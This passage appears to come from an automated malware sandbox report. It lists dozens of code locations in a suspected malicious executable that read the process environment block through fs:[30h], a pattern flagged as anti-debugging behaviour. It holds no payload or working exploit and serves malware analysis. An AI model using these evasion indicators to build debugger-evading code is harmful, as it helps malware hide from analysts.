              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0113E1D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E1D0 mov eax, dword ptr fs:[00000030h]3_2_0113E1D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E1D0 mov eax, dword ptr fs:[00000030h]3_2_0113E1D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011861C3 mov eax, dword ptr fs:[00000030h]3_2_011861C3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011861C3 mov eax, dword ptr fs:[00000030h]3_2_011861C3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F01F8 mov eax, dword ptr fs:[00000030h]3_2_010F01F8
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011961E5 mov eax, dword ptr fs:[00000030h]3_2_011961E5
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01144000 mov ecx, dword ptr fs:[00000030h]3_2_01144000
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010DE016 mov eax, dword ptr fs:[00000030h]3_2_010DE016
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010DE016 mov eax, dword ptr fs:[00000030h]3_2_010DE016
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010DE016 mov eax, dword ptr fs:[00000030h]3_2_010DE016
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010DE016 mov eax, dword ptr fs:[00000030h]3_2_010DE016
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01156030 mov eax, dword ptr fs:[00000030h]3_2_01156030
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BA020 mov eax, dword ptr fs:[00000030h]3_2_010BA020
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BC020 mov eax, dword ptr fs:[00000030h]3_2_010BC020
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01146050 mov eax, dword ptr fs:[00000030h]3_2_01146050
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C2050 mov eax, dword ptr fs:[00000030h]3_2_010C2050
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EC073 mov eax, dword ptr fs:[00000030h]3_2_010EC073
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C208A mov eax, dword ptr fs:[00000030h]3_2_010C208A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011860B8 mov eax, dword ptr fs:[00000030h]3_2_011860B8
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011860B8 mov ecx, dword ptr fs:[00000030h]3_2_011860B8
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010B80A0 mov eax, dword ptr fs:[00000030h]3_2_010B80A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011580A8 mov eax, dword ptr fs:[00000030h]3_2_011580A8
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011420DE mov eax, dword ptr fs:[00000030h]3_2_011420DE
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011020F0 mov ecx, dword ptr fs:[00000030h]3_2_011020F0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C80E9 mov eax, dword ptr fs:[00000030h]3_2_010C80E9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BA0E3 mov ecx, dword ptr fs:[00000030h]3_2_010BA0E3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011460E0 mov eax, dword ptr fs:[00000030h]3_2_011460E0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BC0F0 mov eax, dword ptr fs:[00000030h]3_2_010BC0F0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FA30B mov eax, dword ptr fs:[00000030h]3_2_010FA30B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FA30B mov eax, dword ptr fs:[00000030h]3_2_010FA30B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FA30B mov eax, dword ptr fs:[00000030h]3_2_010FA30B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BC310 mov ecx, dword ptr fs:[00000030h]3_2_010BC310
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E0310 mov ecx, dword ptr fs:[00000030h]3_2_010E0310
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01198324 mov eax, dword ptr fs:[00000030h]3_2_01198324
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01198324 mov ecx, dword ptr fs:[00000030h]3_2_01198324
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01198324 mov eax, dword ptr fs:[00000030h]3_2_01198324
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01198324 mov eax, dword ptr fs:[00000030h]3_2_01198324
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01168350 mov ecx, dword ptr fs:[00000030h]3_2_01168350
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114035C mov eax, dword ptr fs:[00000030h]3_2_0114035C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114035C mov eax, dword ptr fs:[00000030h]3_2_0114035C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114035C mov eax, dword ptr fs:[00000030h]3_2_0114035C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114035C mov ecx, dword ptr fs:[00000030h]3_2_0114035C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114035C mov eax, dword ptr fs:[00000030h]3_2_0114035C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114035C mov eax, dword ptr fs:[00000030h]3_2_0114035C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118A352 mov eax, dword ptr fs:[00000030h]3_2_0118A352
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0119634F mov eax, dword ptr fs:[00000030h]3_2_0119634F
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116437C mov eax, dword ptr fs:[00000030h]3_2_0116437C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E438F mov eax, dword ptr fs:[00000030h]3_2_010E438F
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E438F mov eax, dword ptr fs:[00000030h]3_2_010E438F
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BE388 mov eax, dword ptr fs:[00000030h]3_2_010BE388
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BE388 mov eax, dword ptr fs:[00000030h]3_2_010BE388
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BE388 mov eax, dword ptr fs:[00000030h]3_2_010BE388
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010B8397 mov eax, dword ptr fs:[00000030h]3_2_010B8397
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010B8397 mov eax, dword ptr fs:[00000030h]3_2_010B8397
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010B8397 mov eax, dword ptr fs:[00000030h]3_2_010B8397
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011643D4 mov eax, dword ptr fs:[00000030h]3_2_011643D4
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011643D4 mov eax, dword ptr fs:[00000030h]3_2_011643D4
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA3C0 mov eax, dword ptr fs:[00000030h]3_2_010CA3C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA3C0 mov eax, dword ptr fs:[00000030h]3_2_010CA3C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA3C0 mov eax, dword ptr fs:[00000030h]3_2_010CA3C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA3C0 mov eax, dword ptr fs:[00000030h]3_2_010CA3C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA3C0 mov eax, dword ptr fs:[00000030h]3_2_010CA3C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA3C0 mov eax, dword ptr fs:[00000030h]3_2_010CA3C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C83C0 mov eax, dword ptr fs:[00000030h]3_2_010C83C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C83C0 mov eax, dword ptr fs:[00000030h]3_2_010C83C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C83C0 mov eax, dword ptr fs:[00000030h]3_2_010C83C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C83C0 mov eax, dword ptr fs:[00000030h]3_2_010C83C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116E3DB mov eax, dword ptr fs:[00000030h]3_2_0116E3DB
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116E3DB mov eax, dword ptr fs:[00000030h]3_2_0116E3DB
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116E3DB mov ecx, dword ptr fs:[00000030h]3_2_0116E3DB
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116E3DB mov eax, dword ptr fs:[00000030h]3_2_0116E3DB
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011463C0 mov eax, dword ptr fs:[00000030h]3_2_011463C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0117C3CD mov eax, dword ptr fs:[00000030h]3_2_0117C3CD
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F63FF mov eax, dword ptr fs:[00000030h]3_2_010F63FF
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010DE3F0 mov eax, dword ptr fs:[00000030h]3_2_010DE3F0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010DE3F0 mov eax, dword ptr fs:[00000030h]3_2_010DE3F0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010DE3F0 mov eax, dword ptr fs:[00000030h]3_2_010DE3F0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010B823B mov eax, dword ptr fs:[00000030h]3_2_010B823B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0119625D mov eax, dword ptr fs:[00000030h]3_2_0119625D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0117A250 mov eax, dword ptr fs:[00000030h]3_2_0117A250
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0117A250 mov eax, dword ptr fs:[00000030h]3_2_0117A250
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C6259 mov eax, dword ptr fs:[00000030h]3_2_010C6259
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01148243 mov eax, dword ptr fs:[00000030h]3_2_01148243
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01148243 mov ecx, dword ptr fs:[00000030h]3_2_01148243
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BA250 mov eax, dword ptr fs:[00000030h]3_2_010BA250
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010B826B mov eax, dword ptr fs:[00000030h]3_2_010B826B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C4260 mov eax, dword ptr fs:[00000030h]3_2_010C4260
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C4260 mov eax, dword ptr fs:[00000030h]3_2_010C4260
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C4260 mov eax, dword ptr fs:[00000030h]3_2_010C4260
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE284 mov eax, dword ptr fs:[00000030h]3_2_010FE284
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE284 mov eax, dword ptr fs:[00000030h]3_2_010FE284
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01140283 mov eax, dword ptr fs:[00000030h]3_2_01140283
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01140283 mov eax, dword ptr fs:[00000030h]3_2_01140283
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01140283 mov eax, dword ptr fs:[00000030h]3_2_01140283
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D02A0 mov eax, dword ptr fs:[00000030h]3_2_010D02A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D02A0 mov eax, dword ptr fs:[00000030h]3_2_010D02A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011562A0 mov eax, dword ptr fs:[00000030h]3_2_011562A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011562A0 mov ecx, dword ptr fs:[00000030h]3_2_011562A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011562A0 mov eax, dword ptr fs:[00000030h]3_2_011562A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011562A0 mov eax, dword ptr fs:[00000030h]3_2_011562A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011562A0 mov eax, dword ptr fs:[00000030h]3_2_011562A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011562A0 mov eax, dword ptr fs:[00000030h]3_2_011562A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA2C3 mov eax, dword ptr fs:[00000030h]3_2_010CA2C3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA2C3 mov eax, dword ptr fs:[00000030h]3_2_010CA2C3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA2C3 mov eax, dword ptr fs:[00000030h]3_2_010CA2C3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA2C3 mov eax, dword ptr fs:[00000030h]3_2_010CA2C3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA2C3 mov eax, dword ptr fs:[00000030h]3_2_010CA2C3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011962D6 mov eax, dword ptr fs:[00000030h]3_2_011962D6
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D02E1 mov eax, dword ptr fs:[00000030h]3_2_010D02E1
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D02E1 mov eax, dword ptr fs:[00000030h]3_2_010D02E1
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D02E1 mov eax, dword ptr fs:[00000030h]3_2_010D02E1
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01156500 mov eax, dword ptr fs:[00000030h]3_2_01156500
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C8550 mov eax, dword ptr fs:[00000030h]3_2_010C8550
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C8550 mov eax, dword ptr fs:[00000030h]3_2_010C8550
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F656A mov eax, dword ptr fs:[00000030h]3_2_010F656A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F656A mov eax, dword ptr fs:[00000030h]3_2_010F656A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F656A mov eax, dword ptr fs:[00000030h]3_2_010F656A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F4588 mov eax, dword ptr fs:[00000030h]3_2_010F4588
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C2582 mov eax, dword ptr fs:[00000030h]3_2_010C2582
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C2582 mov ecx, dword ptr fs:[00000030h]3_2_010C2582
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE59C mov eax, dword ptr fs:[00000030h]3_2_010FE59C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011405A7 mov eax, dword ptr fs:[00000030h]3_2_011405A7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011405A7 mov eax, dword ptr fs:[00000030h]3_2_011405A7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011405A7 mov eax, dword ptr fs:[00000030h]3_2_011405A7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E45B1 mov eax, dword ptr fs:[00000030h]3_2_010E45B1
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E45B1 mov eax, dword ptr fs:[00000030h]3_2_010E45B1
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE5CF mov eax, dword ptr fs:[00000030h]3_2_010FE5CF
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE5CF mov eax, dword ptr fs:[00000030h]3_2_010FE5CF
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C65D0 mov eax, dword ptr fs:[00000030h]3_2_010C65D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FA5D0 mov eax, dword ptr fs:[00000030h]3_2_010FA5D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FA5D0 mov eax, dword ptr fs:[00000030h]3_2_010FA5D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FC5ED mov eax, dword ptr fs:[00000030h]3_2_010FC5ED
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FC5ED mov eax, dword ptr fs:[00000030h]3_2_010FC5ED
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
